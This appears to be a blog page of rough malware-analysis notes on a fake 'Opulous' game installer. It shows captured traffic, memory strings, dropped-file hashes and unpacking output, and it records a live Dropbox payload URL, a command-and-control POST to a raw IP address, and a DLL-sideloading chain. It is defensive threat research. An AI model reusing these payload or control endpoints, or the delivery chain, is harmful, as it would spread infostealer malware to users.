This is just a page of rough notes I'm taking as I go through Opulous analysis from https://x.com/sta5i/status/1962591346407154110
POST https://glitch.footballismy[.]life/api/4/envelope/ HTTP/1.1
x-sentry-auth: Sentry sentry_key=71878a140ea8482c86abc998e4ca02bb, sentry_version=7, sentry_timestamp=1757078735.0221975, sentry_client=sentry.rust/0.42.0
accept: */*
host: glitch.footballismy[.]life
content-length: 13132 sdk":{"name":"sentry.rust","version":"0.42.0","integrations":["attach-stacktrace","debug-images","contexts","panic","process-stacktrace"],"packages":[{"name":"cargo:sentry","version":"0.42.0"}]}}
POST http://ipc.localhost/loadData HTTP/1.1
Host: ipc.localhost
Proxy-Connection: keep-alive
Content-Length: 2
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Chromium";v="139", "Microsoft Edge WebView2";v="139", "Microsoft Edge";v="139", "Not;A=Brand";v="99"
sec-ch-ua-mobile: ?0
tauri-invoke-key: fXKt:B2Ws>9ik%<8c 10.0="" 145="" 1468221969="" 693554907="" accept-encoding:="" accept-language:="" accept-language="" accept:="" api.ipify.org="" applewebkit="" application="" ash-speed.hetzner.com="" bin="" br="" charset="utf-8" chrome="" connect-src="" connection:="" content-language:="" content-length:="" content-security-policy:="" content-type:="" cors="" cross-site="" data:="" default-src="" deflate="" deny="" edg="" empty="" en-us="" en="" frame-src="" gecko="" get="" glitchtip.com="" gzip="" host:="" html="" http:="" http="" https:="" img-src="" indows="" jbj8ngeqfbnbojmii7fdmlixb6qe4="; font-src " json="" keep-alive="" like="" mozilla="" nt="" origin:="" origin="" p="" q="0.9" referer:="" safari="" script-src="" sec-fetch-dest:="" sec-fetch-mode:="" sec-fetch-site:="" self="" sha256-ircdq27xixx4k="" style-src="" tauri-callback:="" tauri-error:="" tauri.localhost="" text="" unsafe-inline="" user-agent:="" vary:="" win64="" x-frame-options:="" x64="" zstd="">
msedgewebview2 \AppData\Local\con.app.opulous\EBWebView NOTES
0x43fc01ac1440 (23): http://tauri.localhost/
0x43fc01ac1480 (35): http://ipc.localhost/download_files
http://ipc.localhost/plugin%3Ahttp%7Cfetch_send
http://ipc.localhost/plugin%3Ahttp%7Cfetch_send
0x43fc0193f218 (29): http://ipc.localhost/loadData
0x43fc01791db0 (47): http://tauri.localhost/assets/index-ZElHxHms.js
0x43fc01790180 (172): Uncaught (in promise) error sending request for url (https://opulousapp.com/files.php)
0x43fc014be166 (47): http://tauri.localhost/assets/index-CndO1qb_.js
0x43fc007d1680 (101): "Chromium";v="139", "Microsoft Edge WebView2";v="139", "Microsoft Edge";v="139", "Not;A=Brand";v="99"
0x43fc007d1840 (88): embedded_browser.mojom.EmbeddedBrowserWebViewHandler [primary] PipeControlMessageHandler
0x43fc0143d3bd (43): https://opulousapp.com/events.php?type=game
0x43fc0060b770 (196): Uncaught (in promise) error sending request for url (https://opulousapp.com/events.php?type=login)
0x43fc00605520 (192): C:\Program Files (x86)\Microsoft\EdgeWebView\Application\139.0.3405.125\resources\edge_clipboard
0x66600002c126 (56): --embedded-browser-webview=1
0x66600002c160 (60): --webview-exe-name=opulous.exe
0x66600002c19e (54): --webview-exe-version=0.1.0
0x66600002c1d6 (140): --user-data-dir=C:\Users\drago\AppData\Local\con.app.opulous\EBWebView
0x66600002c264 (28): --noerrdialogs
0x66600002c282 (84): --embedded-browser-webview-dpi-awareness=2
opulous.exe NOTES
0x220001494d4 (254): {"clientConfig":{"method":"PUT","url":"https://opulousapp.com/events.php?type=game","headers":[["content-type","application/json"]],"data":[123,34,97,112,112,34,58,34,79,80,34,44,34,101,118,101,110,116,34,58,34,108,97,117,110,99,104,34,125]}}khasPostData DECODES to {"app":"OP","event":"launch"}
gamefiles.pak
0x2200013ca43 (437): eta charset="UTF-8" />
Tauri + React + Typescript
0x220000dc60e (77): :_sers\\xxxx\\AppData\\Local\\Temp\\kGqJVu6VvtoO","fileName":"NAJKQGZY.exe"}
0x220000e837e (158): {/KQGZY","fileName":"NAJKQGZY.exe","route":"https://www.dropbox.com/scl/fi/pxa8akdp3fffmuufrvp8f/OpulAi.zip?rlkey=7hpt86dl8ie45cmf2uoonaw40&st=5m3ogubi&dl=1"}
0x22000069838 (47): 70,103,70,69,69,112,108,0]).buffer, index: 0 })
0x22000069c10 (855): NTERNALS__.runCallback(4202606803, { message: new Uint8Array([97,48,111,98,83,86,70,69,81,107,86,67,82,65,69,87,68,65,57,53,100,51,78,52,102,67,89,55,89,82,69,66,81,49,78,97,88,81,78,51,87,81,104,82,69,65,48,97,102,110,66,122,99,109,70,119,97,50,115,68,85,120,49,82,70,65,69,86,82,70,90,71,87,81,82,68,65,104,70,70,70,85,70,68,81,108,120,108,70,122,107,98,82,85,66,80,72,108,86,76,86,107,66,86,88,107,111,68,86,81,112,90,97,103,74,69,86,86,86,118,65,103,99,73,90,66,120,100,71,86,81,76,85,65,49,100,83,70,90,83,86,70,70,86,82,85,82,102,83,48,90,72,67,86,82,120,71,83,112,69,81,48,70,50,88,120,100,74,82,66,70,101,83,108,57,71,66,69,119,79,66,103,53,74,84,70,48,67,86,108,115,65,87,86,81,78,68,70,78,97,86,119,66,89,87,81,112,97,86,49,111,68,66,104,57,65,87,86,120,85,86,81,66,67,66,107,66,82,87,69,66,100,86,70,103,70,69,69,112,108,0]).buffer, index: 0 })
OpulAi.zip Files dropped:
opulous.exe NOTES
"SHA256","E6CCD95BD470FC05D482EC08C3EAC7CE2E2E46CAD9DEA21C8ADF2BB428B5A92F","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\aegisub.exe"
"SHA256","8514BEF24B0344F966208E034E0F5C34E8D830391260DCA534E63C2CAB7E88FF","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\avdevice-60.dll"
"SHA256","097D68AC147A0906E93E8E96DEDB57DB0CD0AA24B85B4E8E395A22B6C3101444","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\avformat-60.dll"
"SHA256","F4218B498FD94DD6E243CD9E7E913BD2AFA87C86330371D04E581065E9BBCAC6","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\AviSynth.dll"
"SHA256","FDEA16C02CAACC978B683EA746803914FA6DFB26D5077CEDB2CF2B8B9A3007F4","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\clrjit.dll"
"SHA256","0DCFD688C2217BCBE71D24BABB89581C993A98CCC0DBC5CCA5871A1CBFD79178","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\cmake-gui.exe"
"SHA256","C5CECF8E663F105217FF5805BB1D748F7DE2FE3767312974B677B3C818883D2C","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\cmake.exe"
"SHA256","B63A486A7D0CDAB5CE202D9B19744F287BC4FF30229F2389BF6712F578A4B887","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\crash_handler.exe"
"SHA256","7197205BE41D52E853656BBEC4472B9E836FE5E180913897B327839A05A89F84","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\devenv.exe"
"SHA256","FB0FBD00530725921524184E5E3BBFDE03EFB52A636AB971DC24ED30D90CDC95","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\DevIL.dll"
"SHA256","5783907FF433CA082DA6A57133D3E6AB2B4FBC6386FBA965B31F6BE0EB94CA36","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\DirectShowSource.dll"
"SHA256","C077AEDC85C7DE62B353D1A69CED7292E330C064A4251A6CA6D614DA93CA0C30","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\gmp-10.dll"
"SHA256","F18E2C2DA89F94145008586F115476D112A5816063EF4E90602CA5D1FDFB839C","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\Iex.dll"
"SHA256","D977762EF0652081C6858F55AAA78011E9AB7532ED4940433568037967C17825","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\IlmThread.dll"
"SHA256","04F7F698CC6CE0F8EA27F5B26361F77B60CFA05AF063C0288C555C06776A0BEE","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\imath.dll"
"SHA256","6103FA5180CCB090629457ABE21EF7A62525B1D4DE2C353480D52431921D676C","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\libcrypto-1_1-x64.dll"
"SHA256","8443613C77FC4C6E5F1FFDD54268E80F944DE20D3875FF397D3B6BBAE916D122","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\libgmpxx.dll"
"SHA256","47BFEAB0EAFDC215CF8C73ABDA9F55D97B2DFCC5BDF9C33C230E662000AD63FD","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\libssl-1_1-x64.dll"
"SHA256","F43EA5718108215D581C5B09F5AA3CC8A1418C11C65757A32FDF036DDC4CAC1A","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\MaterialXCore.dll"
"SHA256","849C82BA0998269CC9FC8EF06BDA8B276502C28587C2E76D580A5552C013D8C6","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\MaterialXFormat.dll"
"SHA256","7FC13BCE387069EDEFB3A5D546AAE60AFAE9733FE13203BBECBB628F431BD658","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\MaterialXGenGlsl.dll"
"SHA256","16E1A6FC7AC9F22986412ECE425CB38A90A6C5B75C738D90DC58134D1F412EA6","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\MaterialXGenMdl.dll"
"SHA256","5AEC8947F1867C0F9803468C8082F7882F63FFF4D4960D5FD71BC6EF04410721","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\MaterialXGenMsl.dll"
"SHA256","8C39C6994CB26D6B9684C9F3A09A86596784CCF71B707B10E6B6FC8C3E2E0C53","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\MaterialXGenOsl.dll"
"SHA256","A4C41E6A516569E5FBF92AB6071755D959AA4A38F4BA966C6ECC86BAFA130F56","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\MaterialXGenShader.dll"
"SHA256","C8510CE509C4D8D8EFBC0496E020CD2F0308A4BFDA6DDF82C9EB5DC0A5442287","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\MaterialXRender.dll"
"SHA256","62127C51C4CCE1F036CEFB4426745589055FEFFFECFFF6D39DF8595239FF3E1C","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\MaterialXRenderGlsl.dll"
"SHA256","EFC7402D73AA8E6B46D37FF527F388764E1DA759A534CF4189370448880542DB","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\MaterialXRenderHw.dll"
"SHA256","9FC032A3D9CD2B9450184C4876EA916E92ACBE699662984F32E850E7D07A7F5F","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\MaterialXRenderOsl.dll"
"SHA256","E964420DFD690E8787B716C714BF18731F8F94B9243910D601055AAE00913478","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\mfc140deu.dll"
"SHA256","09C26867D815AE5D6F228DFB90EBC7A63498104497A5373CBE6D223F4010B33A","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\mfc140u.dll"
"SHA256","A72D6D5EB560E21583B73DBED845DE197829ACD972279C8EBCC2B14F8611DFF6","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\Microsoft.VisualStudio.Telemetry.dll"
"SHA256","1A019CDC626A9E0A958720C26FEC693C81F5F8F8D24271F5A893566200CFB0EF","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\MSBuild.exe"
"SHA256","1B6F9E74C2349E744E47BBDAD21BFDD786ABF348A15B9EDDA9F720A3413B19F7","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\MSBuildTaskHost.exe"
"SHA256","D9F0905831E312EF621D986D429A061C6435376E79551380E6A5AF1153C823B0","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\NAJKQGZY.exe"
"SHA256","E1E27AF7B07EEEDF5CE71A9255F0422816A6FC5849A483C6714E1B472044FA9D","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\Newtonsoft.Json.dll"
"SHA256","BB63524995BB13E6133E22902F89E6C5061ED83BBC66DC51410F751C49E9181F","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\plugin_host-3.3.exe"
"SHA256","B1B610176A602D8CC690CE3EB4ABDD3F78290D975E98CE22CDCA559BEC758BA9","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\plugin_host-3.8.exe"
"SHA256","7A9E33C53A6D3C921E23228B1538E76B7F59AF9E0DF0E37404AE9E1FD52FEACE","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\PowerToys.Awake.exe"
"SHA256","7B1128331F54ED00E7CAC9761B0DF42AEA18072748B7B85687DDD17E15DA58A3","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\PowerToys.ColorPickerUI.exe"
"SHA256","D8D852008389E8A294469FF1819D557737E9BB7F8BBA8B974AB62FEE6675D6A8","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\PowerToys.exe"
"SHA256","81AEF0217C772AF21287EF81945850A44ADD3AD86592B3001B9B1BFF1181358A","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\PowerToys.FancyZones.exe"
"SHA256","A94B98F5AD2D4A25284DA1FCF3E19BE17FF87F118D946845544EDFF3439BE517","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\PowerToys.FancyZonesEditor.exe"
"SHA256","6BF835417CE86DC2DDF5953E701949330577484EFBA69664F8E57CB6A593C064","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\PowerToys.ImageResizer.exe"
"SHA256","E23F264CD0C7ED9198555BBBA94B9789013EBA3A1C2D0D270D8BD708A839B969","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\PowerToys.WorkspacesWindowArranger.exe"
"SHA256","30AF2EE00BD2492081BC0D8D123B678B12E066DE7E164A7538C4EE5C46611E07","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\PowerToys.ZoomIt.exe"
"SHA256","F4D18FAD893CBA2CA22A9F9FBD8F3392E3E2797527277F23F0D5914AF2CF2AB3","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\python33.dll"
"SHA256","C69A52B020BA9212DE1C3C46FEB04580E5A27EB0A94CB8EC6C284672565729A9","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\python38.dll"
"SHA256","ACB61EA42642580C6E99B32E1FE1B2A5B3B8045A1E59BD999E3E37B4CE174080","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\ReachFramework.dll"
"SHA256","7E3C74F2BBAE68B4E0A98C97E2C2FD9BFA1689831B4FAFA2971B7107017008DF","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\shootnscroll3d.exe"
"SHA256","A806B9173608C0D75A4C72EDA76E85A67882F488EFE2C7A60509D43D9E63EAC6","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\sqlite3.dll"
"SHA256","6616760BD4DC4A901031ED2D3EC6B476D6D50069B32497CC84E66C8CB3AE8343","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\subl.exe"
"SHA256","1B6CD2CFF5298520393C060801EEBB112FF505A14F64AE8AB4F21ED4F0898EBD","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\sublime_text.exe"
"SHA256","0CF16813B64231215A3D218D949391E18A38A145B0F1AAABC12D520C1EAF9D4F","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\System.Reactive.dll"
"SHA256","2CC0345421B5A7BB3A28B45D33CB751942E9CB3EEE64BF339CC23F189909416B","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\System.Xaml.dll"
"SHA256","94952E907781C68D22294FC38D3463A86BBACF285D637EEB1889F7CF41C69129","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\ucrtbase.dll"
"SHA256","FDD4978F4B238442A37388B9AC9BD7650E33D3FD4343B4074BBFDE4B1D3E1C3A","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\UnicodeInformation.dll"
"SHA256","5F02307C589AA84CC69FF8942E2542B39C71975D054C81B5693D1473B7BAC74A","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\update_installer.exe"
"SHA256","6F34F6829E056FBB7B2DD663D33C9A7629464358039065ADC311E1137644479C","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\vcruntime140.dll"
"SHA256","A83D67E9D892054E247F3082305E139BBCAEEB035FC4669FC0AE6ADEDF0472D7","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\VSDiagnostics.exe"
"SHA256","B304C9849DB63E6632487506A133698BC41465DEE51A439E80D53B2B28507DD4","C:\Users\xxxx\AppData\Local\Temp\kGqJVu6VvtoO\VSFilter.dll"
NAJKQGZY Notes
.\innounp.exe -x -m ..\opulous_10.71.2_x64-setup\NAJKQGZY.exe
innounp - the Inno Setup Unpacker, Version 2.65.1 (8/25/2025)
Inno Setup archive: NAJKQGZY.exe
Inno Setup version detected: 6.4.3 (Unicode)
#1 {tmp}\Debu-Inje.exe - extracted
#2 {tmp}\Heatdrung.gp - extracted
#3 {tmp}\Meershing.mcj - extracted
#4 {tmp}\mfc100.dll - extracted
#5 {tmp}\MSVCR100.dll - extracted
#6 {tmp}\RecZip.dll - extracted
#7 embedded\CompiledCode.bin - extracted
#8 embedded\WizardImage0.bmp - extracted
#9 embedded\WizardSmallImage0.bmp - extracted
#10 embedded\default.isl - extracted
#11 install_script.iss - extracted
"SHA256","523EE0DD45A11EBCAE4ABE94FFD20CC40D706A11FB1D904FF0D1614CA7B9AC9F","C:\Users\xxxx\Downloads\innoopu\{tmp}\Debu-Inje.exe"
"SHA256","C424D02074C60BF0F1BC16D857707319729D13CD110E4C4820ACF74E76630059","C:\Users\xxxx\Downloads\innoopu\{tmp}\hashes.csv"
"SHA256","929E73C26BDA78D8B0E4DDA4ACA5D50815E82CD8ADD43D9221FE90D39ACA016B","C:\Users\xxxx\Downloads\innoopu\{tmp}\Heatdrung.gp"
"SHA256","9E3B6094055BF61B2463F470AF0EAD5A0E96E9A8F51803477D9AE4EB852CD372","C:\Users\xxxx\Downloads\innoopu\{tmp}\Meershing.mcj"
"SHA256","9FA2DCA7626DA0F7786A59AF79D28E85A70B7567C5CF0B9D12A2BFCFDD00F5F8","C:\Users\xxxx\Downloads\innoopu\{tmp}\mfc100.dll"
"SHA256","1D1A1AE540BA132F998D60D3622F0297B6E86AE399332C3B47462D7C0F560A36","C:\Users\xxxx\Downloads\innoopu\{tmp}\MSVCR100.dll"
"SHA256","54678A3A550D8C131237376D8ADE115D7CF4D41B00B8EB216A3C3A6573955837","C:\Users\xxxx\Downloads\innoopu\{tmp}\RecZip.dll"
Debu-Inje.exe
http://45.153.34.123/b0481cf5ba1844ec.php
POST http://45.153.34.123/b0481cf5ba1844ec.php HTTP/1.1
Content-Type: application/json
Host: 45.153.34.123
Content-Length: 136
Proxy-Connection: Keep-Alive
Pragma: no-cache
B3wZFttw+0AhRgUE2+NZrJ+U6htQbLM249o7O0L7XGevjgtEQtJuGTkOjTHf4HtdOuFkHpdwFjaLgvQYcewvqeGHoJ1tEFMPGcEqt9wnfSWFCIUhNqVOECabuKg0l3xiq09KEg
closes, and launches etnavigator128.exe
AppData\Roaming\Syncserver_v4\ (chime setup dd65b976d1865ba6c2368fcf9c9eb223)
debu-inje.exe apepars to be chime setup but likely with dll sideload MFC100.DLL 218e1f37b36fcebfccc08ad2c021777b
Comments
Post a Comment